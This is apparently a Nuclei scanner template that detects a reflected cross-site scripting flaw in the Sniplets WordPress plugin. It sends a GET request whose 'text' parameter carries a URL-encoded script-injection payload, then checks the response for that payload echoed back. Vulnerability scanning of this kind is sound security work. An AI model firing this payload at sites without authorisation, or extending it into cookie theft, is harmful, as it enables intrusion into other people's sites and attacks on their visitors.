id: sniplets-xss

info:
  name: Wordpress Plugin Sniplets - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
  reference:
    - https://www.exploit-db.com/exploits/5194
  tags: xss,wordpress,wp-plugin,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
